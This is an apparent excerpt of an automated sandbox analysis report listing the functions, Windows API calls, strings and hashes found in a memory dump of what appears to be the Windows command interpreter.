                                  • Instruction Fuzzy Hash: EA016D76A80218FBDB319B95DC49FEEBBBCEB84B11F10015AED11AA140D3705A94DA50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0016465D, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(KERNEL32.DLL,?,?,?,00164533), ref: 00164687
                                  • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(FFFFFFFF,SetThreadUILanguage,?,?,?,00164533), ref: 001646A7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: AddressHandleModuleProc
                                  • String ID: KERNEL32.DLL$SetThreadUILanguage
                                  • API String ID: 1646373207-2530943252
                                  • Opcode ID: 8b9e01b80ca58a25121f2a9c0f8a9083dc7cd9892ae3b25044860e9bbf2a7527
                                  • Instruction ID: 06286e54e8aa4f855ba594af110a73055e77b07074584c9400f45d630d89fff9
                                  • Opcode Fuzzy Hash: 8b9e01b80ca58a25121f2a9c0f8a9083dc7cd9892ae3b25044860e9bbf2a7527
                                  • Instruction Fuzzy Hash: E501A231A002199BC7109B28FC08A5D3BB8AF0A739B01035AFC29AB6E0CB705CD186D5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00161F52, Relevance: 7.8, APIs: 5, Instructions: 293COMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 00161FA3
                                  • wcsspn.MSVCRT ref: 00162181
                                  • ??_V@YAXPAX@Z.MSVCRT ref: 00162278
                                    • Part of subcall function 00162D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,00163C29,?,00000000,-00000001,00000000,?,00000000), ref: 00162D87
                                    • Part of subcall function 00162D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00163C29,?,00000000,-00000001,00000000,?,00000000), ref: 00162D91
                                    • Part of subcall function 00162D22: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,00163C29,?,00000000,-00000001,00000000,?,00000000), ref: 00162DA4
                                    • Part of subcall function 00162D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00163C29,?,00000000,-00000001,00000000,?,00000000), ref: 00162DAE
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: ErrorMode$FullNamePathmemsetwcsspn
                                  • String ID:
                                  • API String ID: 1535828850-0
                                  • Opcode ID: 564af7e4c48ad61bf8c2e0373bba408a5510ab508a98b6620bf025dfc3acb3b1
                                  • Instruction ID: 23a8721be40accb9c39a31bc01c6ae77e121a9451d8404b5e0d962436cfb61ab
                                  • Opcode Fuzzy Hash: 564af7e4c48ad61bf8c2e0373bba408a5510ab508a98b6620bf025dfc3acb3b1
                                  • Instruction Fuzzy Hash: B7C18D75A00615CFCB29DF28DC90BA9B7B6BF58304F15819EE40A9B791DB309E92CF40
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00163B5D, Relevance: 7.7, APIs: 5, Instructions: 155COMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 00163B91
                                    • Part of subcall function 00160C70: ??_V@YAXPAX@Z.MSVCRT ref: 00160CBA
                                    • Part of subcall function 00160C70: memset.MSVCRT ref: 00160CDD
                                  • ??_V@YAXPAX@Z.MSVCRT ref: 00163CF6
                                    • Part of subcall function 001600B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0015DF68,00000001,?,00000000,00163458,-00000105,0017BDD8,00000240,00164B82,00000000,00000000,0016AE6E,00000000), ref: 001600C1
                                    • Part of subcall function 001600B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0015DF68,00000001,?,00000000,00163458,-00000105,0017BDD8,00000240,00164B82,00000000,00000000,0016AE6E,00000000,?), ref: 001600C8
                                  • longjmp.MSVCRT(0018B8B8,00000001,-00000001,00000000,?,00000000), ref: 0016E015
                                    • Part of subcall function 0015C923: _wcsicmp.MSVCRT ref: 0015C9CF
                                    • Part of subcall function 0015C923: _wcsicmp.MSVCRT ref: 0015C9E5
                                    • Part of subcall function 0015C923: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,00000000,?,00000000), ref: 0015CA04
                                    • Part of subcall function 0015C923: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0015CA15
                                    • Part of subcall function 001636CB: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,?,0015590A,00000000), ref: 001636F0
                                    • Part of subcall function 00162D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,00163C29,?,00000000,-00000001,00000000,?,00000000), ref: 00162D87
                                    • Part of subcall function 00162D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00163C29,?,00000000,-00000001,00000000,?,00000000), ref: 00162D91
                                    • Part of subcall function 00162D22: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,00163C29,?,00000000,-00000001,00000000,?,00000000), ref: 00162DA4
                                    • Part of subcall function 00162D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00163C29,?,00000000,-00000001,00000000,?,00000000), ref: 00162DAE
                                  • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000000,-00000001,00000000,?,00000000), ref: 00163CC5
                                  • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00163CD0
                                    • Part of subcall function 00162349: wcsrchr.MSVCRT ref: 0016234F
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: Error$Mode$AttributesFileHeapLast_wcsicmpmemset$AllocCurrentDirectoryFullNamePathProcesslongjmpwcsrchr
                                  • String ID:
                                  • API String ID: 3402406610-0
                                  • Opcode ID: f4724e5c6e0e56047693acfc8169f54e2c4ba2b40f562e136951d19934ae1fa6
                                  • Instruction ID: 20c5f6ddf56c3dfd629ae56d5e102a99d763a95585494b0b1d871338a0c7bb2d
                                  • Opcode Fuzzy Hash: f4724e5c6e0e56047693acfc8169f54e2c4ba2b40f562e136951d19934ae1fa6
                                  • Instruction Fuzzy Hash: BB51D735B002259BCB24EFA8DC45A7E77F5EF58310F14406AF959E7281DB709EA0CB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0015B710, Relevance: 7.6, APIs: 5, Instructions: 132COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: memset$_setjmp3
                                  • String ID:
                                  • API String ID: 4215035025-0
                                  • Opcode ID: c573c66bcc06098a8fc42d563d0469d4c2c67c92bc27dd1aa547ff9142b83285
                                  • Instruction ID: d864c82c4295829fbdc9d9da390a21f2dac22ec2212c761c69a39d3833eab423
                                  • Opcode Fuzzy Hash: c573c66bcc06098a8fc42d563d0469d4c2c67c92bc27dd1aa547ff9142b83285
                                  • Instruction Fuzzy Hash: E641A171E05228DBCB24DBA5DCD4AEEBB78EB44304F0401EEE919A7141DB309E98CF94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00178F66, Relevance: 7.6, APIs: 5, Instructions: 106COMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 00178FA5
                                  • memset.MSVCRT ref: 00178FC5
                                    • Part of subcall function 00160C70: ??_V@YAXPAX@Z.MSVCRT ref: 00160CBA
                                    • Part of subcall function 00160C70: memset.MSVCRT ref: 00160CDD
                                  • _wcsicmp.MSVCRT ref: 00179073
                                  • ??_V@YAXPAX@Z.MSVCRT ref: 00179085
                                  • ??_V@YAXPAX@Z.MSVCRT ref: 00179092
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: memset$_wcsicmp
                                  • String ID:
                                  • API String ID: 1670951261-0
                                  • Opcode ID: 5bc5bcbb87ae8a61b1055b47cf99d5304300f706515e7f6cda933f53c9f69bee
                                  • Instruction ID: e7320962f821466f83fa2f1b79312a18b5b60947abf8234e5ea007ed21a986dc
                                  • Opcode Fuzzy Hash: 5bc5bcbb87ae8a61b1055b47cf99d5304300f706515e7f6cda933f53c9f69bee
                                  • Instruction Fuzzy Hash: 79316272A102195BDB24DBA4DC95AEEBB78EB54354F0441ADF909D3141EB349E84CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00178E52, Relevance: 7.6, APIs: 5, Instructions: 103fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • _get_osfhandle.MSVCRT ref: 00178E99
                                  • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00178EA1
                                  • _get_osfhandle.MSVCRT ref: 00178F27
                                  • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,?,00000000,00000000), ref: 00178F2F
                                    • Part of subcall function 001785E9: longjmp.MSVCRT(0018B8F8,00000001,00000000,00178DAB,?,?,?,?,00000000,?,00000021,00000000,?,?,?,00000000), ref: 0017865D
                                    • Part of subcall function 001785E9: memset.MSVCRT ref: 001786B6
                                    • Part of subcall function 001785E9: memset.MSVCRT ref: 001786E4
                                    • Part of subcall function 001785E9: memset.MSVCRT ref: 00178712
                                  • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00178F40
                                    • Part of subcall function 0015DB92: _close.MSVCRT ref: 0015DBC1
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: memset$File_get_osfhandle$ErrorLastPointerRead_closelongjmp
                                  • String ID:
                                  • API String ID: 288106245-0
                                  • Opcode ID: 2b745e843ffef48209c1d43e6f2bd6e101f1170451401c125af9129bd0dc3012
                                  • Instruction ID: 187128c3bf7811a83963f795d3e297de2fdd29749424322eb5d8feee4e1bc6fb
                                  • Opcode Fuzzy Hash: 2b745e843ffef48209c1d43e6f2bd6e101f1170451401c125af9129bd0dc3012
                                  • Instruction Fuzzy Hash: D331B371E50204AFEB18DF79D849BAE7779EB94321F20C12AF919D62C0EF749D408B90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00155712, Relevance: 7.6, APIs: 5, Instructions: 98fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • _get_osfhandle.MSVCRT ref: 00155734
                                  • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0017896D,00000021,?,?,00000000,?,?,?,?,?,00000000,?,00000021,00000000,?), ref: 0015573C
                                  • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,00000000,00000000), ref: 001696FE
                                  • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,00000000,00000000), ref: 0016974A
                                  • DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,?,00000000,00000000), ref: 00169775
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: ErrorFileLast$DeleteRead_get_osfhandle
                                  • String ID:
                                  • API String ID: 3588551418-0
                                  • Opcode ID: 35423d46eaab24c521d52ad053063c37be617a024ceebda112c81c65f2dca856
                                  • Instruction ID: 4c811ae5bcf29d916fac70f469151b7c18682619aea7ab5fa6a68ea1e6ecd39a
                                  • Opcode Fuzzy Hash: 35423d46eaab24c521d52ad053063c37be617a024ceebda112c81c65f2dca856
                                  • Instruction Fuzzy Hash: E031E231A10105DBDB28DF25EC6593A777AEF88301B54802AEC22DB290DB309C908F90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00166A96, Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 00166ACB
                                    • Part of subcall function 00160C70: ??_V@YAXPAX@Z.MSVCRT ref: 00160CBA
                                    • Part of subcall function 00160C70: memset.MSVCRT ref: 00160CDD
                                  • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,-00000001,?,?,00000000), ref: 00166B0F
                                  • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00166B3E
                                  • ??_V@YAXPAX@Z.MSVCRT ref: 00166B4F
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: memset$DriveInformationTypeVolume
                                  • String ID:
                                  • API String ID: 285405857-0
                                  • Opcode ID: 17dab4a8303d11312541462e8a0c665d0d4b6496643c349532d499a13f288295
                                  • Instruction ID: f33d35a697303c594299aac569a2b034583f94fa02091ac38212f85f8aa048a1
                                  • Opcode Fuzzy Hash: 17dab4a8303d11312541462e8a0c665d0d4b6496643c349532d499a13f288295
                                  • Instruction Fuzzy Hash: 0021A332A01128EACB20DBA9DC49AFFBBBCEF05750F04055AE505D3150DB359A94CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00160662, Relevance: 7.6, APIs: 5, Instructions: 75COMMON
                                  Download Yara Rule
                                  APIs
                                  • _get_osfhandle.MSVCRT ref: 00160699
                                  • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,001569F2,?,00000001,?,?,00000000), ref: 001606A1
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: FilePointer_get_osfhandle
                                  • String ID:
                                  • API String ID: 1013686580-0
                                  • Opcode ID: efe97ff6c82641a27dca07c5814c9f735bb7890a3bbb7757f31f7a42412b5173
                                  • Instruction ID: 73223e49aff53ddff7981bf94ef777056b23221659d78bb9b16e8e4306e986f8
                                  • Opcode Fuzzy Hash: efe97ff6c82641a27dca07c5814c9f735bb7890a3bbb7757f31f7a42412b5173
                                  • Instruction Fuzzy Hash: 3F110232200205EFD3246B6DEC4AB3937A4EB45751F20011AF5669A1E0CFA2ADE4C794
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00177EC0, Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00160178: _get_osfhandle.MSVCRT ref: 00160183
                                    • Part of subcall function 00160178: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0016D6A1), ref: 0016018D
                                  • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 00177EF1
                                  • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?), ref: 00177EFE
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: BufferConsoleFileHandleInfoScreenType_get_osfhandle
                                  • String ID:
                                  • API String ID: 2847887402-0
                                  • Opcode ID: d36fc0e8682caf9a4e4c26de9c553d8df4cbc7ae30c9e94e6a7466d31dcf3e2e
                                  • Instruction ID: 9759f7db2d1594b4bf49363387f267e804b68eb1b47aedc3b31552fca04ef39e
                                  • Opcode Fuzzy Hash: d36fc0e8682caf9a4e4c26de9c553d8df4cbc7ae30c9e94e6a7466d31dcf3e2e
                                  • Instruction Fuzzy Hash: 292160369142099ADB00EFF89D05AEEB7B8EF1C710F10415AF925F7590EB3099818769
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001646D8, Relevance: 7.6, APIs: 5, Instructions: 52threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(0016458C), ref: 001646D8
                                  • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00183840), ref: 001646E9
                                  • memset.MSVCRT ref: 00164703
                                  • GetThreadLocale.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 0016E8B8
                                  • memset.MSVCRT ref: 0016E92E
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: memset$ConsoleInfoLocaleOutputThread
                                  • String ID:
                                  • API String ID: 1263632223-0
                                  • Opcode ID: 90fc3f2ceb171d64d751fd789118eed86c5a245c8220b5b42d9dddcb197d3b9b
                                  • Instruction ID: b26d221fc9418d609b661d0c4aab492b046a62caaa678dfcbdfda7845bbc4237
                                  • Opcode Fuzzy Hash: 90fc3f2ceb171d64d751fd789118eed86c5a245c8220b5b42d9dddcb197d3b9b
                                  • Instruction Fuzzy Hash: B71162B4D182519AEB746B18EC8A3643AC8AB02B00F4C032EF4D1569A5E3AD47EA8355
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00167513, Relevance: 7.6, APIs: 5, Instructions: 51timethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetSystemTimeAsFileTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000), ref: 00167540
                                  • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 0016754F
                                  • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00167558
                                  • GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00167561
                                  • QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?), ref: 00167576
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                  • String ID:
                                  • API String ID: 1445889803-0
                                  • Opcode ID: e61e65bb3e6bbf129138fe9978ee9564a00640a8e5a1d041837f8782bcbd3605
                                  • Instruction ID: 0014bbb7d18d24d9d73c384afdfd654b52df9b79600d3a0dada5b61d67d47a02
                                  • Opcode Fuzzy Hash: e61e65bb3e6bbf129138fe9978ee9564a00640a8e5a1d041837f8782bcbd3605
                                  • Instruction Fuzzy Hash: 29111871D19208EBCF10DFF8EE4869EB7F5EF48315F5148AAE806E7650E7309A918B41
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00163AAE, Relevance: 7.5, APIs: 5, Instructions: 32memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,00163A9F), ref: 00163AB2
                                  • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 00163ACD
                                  • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00163AD4
                                  • memcpy.MSVCRT ref: 00163AE3
                                  • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 00163AEC
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: EnvironmentHeapStrings$AllocFreeProcessmemcpy
                                  • String ID:
                                  • API String ID: 713576409-0
                                  • Opcode ID: 94fc1ca8ca91ce0cbb4cd0c6e4b8f16400febeb951f26f6c58bff56431f42704
                                  • Instruction ID: 698811e30e1e64d20df071f29c2b7fdaed9d47c33245260c278f315e86ad6a3d
                                  • Opcode Fuzzy Hash: 94fc1ca8ca91ce0cbb4cd0c6e4b8f16400febeb951f26f6c58bff56431f42704
                                  • Instruction Fuzzy Hash: 8BE09AB360012267D211276E6C4CDAFAA6EEBC9A71706016AF959C3204DF328D4681B2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00165266, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 303COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00165590: memset.MSVCRT ref: 00165614
                                    • Part of subcall function 00160040: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,00000000,001636B3,00163691,00000000), ref: 00160078
                                    • Part of subcall function 00160040: RtlFreeHeap.NTDLL(00000000), ref: 0016007F
                                  • memset.MSVCRT ref: 00165303
                                    • Part of subcall function 001600B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0015DF68,00000001,?,00000000,00163458,-00000105,0017BDD8,00000240,00164B82,00000000,00000000,0016AE6E,00000000), ref: 001600C1
                                    • Part of subcall function 001600B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0015DF68,00000001,?,00000000,00163458,-00000105,0017BDD8,00000240,00164B82,00000000,00000000,0016AE6E,00000000,?), ref: 001600C8
                                  • memset.MSVCRT ref: 0016547A
                                  • longjmp.MSVCRT(0018B8B8,00000001,?,?,?), ref: 0016F111
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: Heap$memset$Process$AllocFreelongjmp
                                  • String ID: *.*
                                  • API String ID: 539101449-438819550
                                  • Opcode ID: cb8acfe41ca3747b3144877f3d03097c89c01cfa06c3dce11ed529ee3bd7364a
                                  • Instruction ID: fd6c0a197b3f0583dde7ae4bc4bdeb68226ef3b236d0d4fab208a6834065f8dc
                                  • Opcode Fuzzy Hash: cb8acfe41ca3747b3144877f3d03097c89c01cfa06c3dce11ed529ee3bd7364a
                                  • Instruction Fuzzy Hash: 09B1C071E00615DBCF24DFA8CC45AAEB7B3EF68350F158069E806AB241EB31DD61CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0015F090, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 188COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID:
                                  • String ID: GeToken: (%x) '%s'$Ungetting: '%s'
                                  • API String ID: 0-1704545398
                                  • Opcode ID: c1a1046e9e1846fad8ce7bd0517110070a9cb4ed3e8d3caa25ef568e3704d4c5
                                  • Instruction ID: 35dcfd2c7ba57062a2cc427060af64f1c174e5b203350127ea33dcf7571aeb80
                                  • Opcode Fuzzy Hash: c1a1046e9e1846fad8ce7bd0517110070a9cb4ed3e8d3caa25ef568e3704d4c5
                                  • Instruction Fuzzy Hash: 1C513671A00104DBDB28BF64CD9137A72A2EB64316F15803EEC268F691EB718D9FC791
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00174159, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 146COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: iswdigit$wcstol
                                  • String ID: aApP
                                  • API String ID: 644763121-2547155087
                                  • Opcode ID: 3418289d26cc0230caeb559083014ab21ded9e2112a41f84bfc2e52448aac649
                                  • Instruction ID: fd55eff84cea52218556233c2830d030a2e8da049d5df86341966f4405174cb4
                                  • Opcode Fuzzy Hash: 3418289d26cc0230caeb559083014ab21ded9e2112a41f84bfc2e52448aac649
                                  • Instruction Fuzzy Hash: 7F411675A0011287CF24DFB8E88127EB3B5EF65301715842AFD4ADB686E731DD92C391
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00174B4E, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 139registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00174B9E
                                  • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00174C2C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: EnumErrorLast
                                  • String ID: %s=%s$.
                                  • API String ID: 1967352920-4275322459
                                  • Opcode ID: 092ac73237f2830d1bcd563daf0f56a733cbb7d03775e8d8185cf600ee0fbcc4
                                  • Instruction ID: b70ab158a8c7e52684b4e309e4a73df73e13004f42e72826eeb1bca85635895b
                                  • Opcode Fuzzy Hash: 092ac73237f2830d1bcd563daf0f56a733cbb7d03775e8d8185cf600ee0fbcc4
                                  • Instruction Fuzzy Hash: 3C415A71F0121987CB35AB695C95ABB7379EBA4300F1581A9F81E97241DB718E818B90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001662FA, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 87COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: _wcsnicmp
                                  • String ID: /-Y$COPYCMD
                                  • API String ID: 1886669725-617350906
                                  • Opcode ID: 8063af5fc6a305aa55618de34cc362d35a9b7e6f6258c07ea808d9d41b6e6077
                                  • Instruction ID: 545368860004458b33f589713a17028b76f352bb13aff2db7d6e37c251f009ef
